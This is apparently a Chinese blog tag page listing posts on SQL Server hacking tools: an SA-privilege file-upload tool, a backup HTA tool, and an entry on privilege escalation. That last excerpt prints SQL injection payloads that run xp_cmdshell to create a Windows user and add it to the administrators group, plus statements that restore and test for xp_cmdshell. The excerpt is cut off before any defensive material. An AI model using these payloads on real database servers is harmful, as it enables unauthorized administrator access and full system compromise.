Sa-Upfile 1.0(sa权限上传文件)
作者:Bin
使用环境:SQL2000,SA权限,常用提权扩展存在。
原理 :利用textcopy进行二进制导入导出。
文件下载 :
SA-Upfile
SA-Upfile (Google)
标签 ‘SQL Server’ 下的日志
sqlserver备份hta工具(支持sqlserver2005)
作者:Mikawawa
最近碰到这个问题,在网上找了些工具,要么不好使要么就是只支持sqlserver2000,为了以后方便使用,随手写了个工具。里面用到的备份代码都是网上公开的,截图如下:
阅读全文 »
SQL Server提升权限相关命令及防范
;exec master..xp_cmdshell "net user name password /add"–
;exec master..xp_cmdshell "net localgroup administrators name /add"–
程序代码开启cmdshell的SQL语句
EXEC sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
判断存储扩展是否存在
select count(*) from master.dbo.sysobjects where xtype='X' and name='xp_cmdshell'
返回结果为1就OK
恢复xp_cmdshell
Exec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select 阅读全文 »
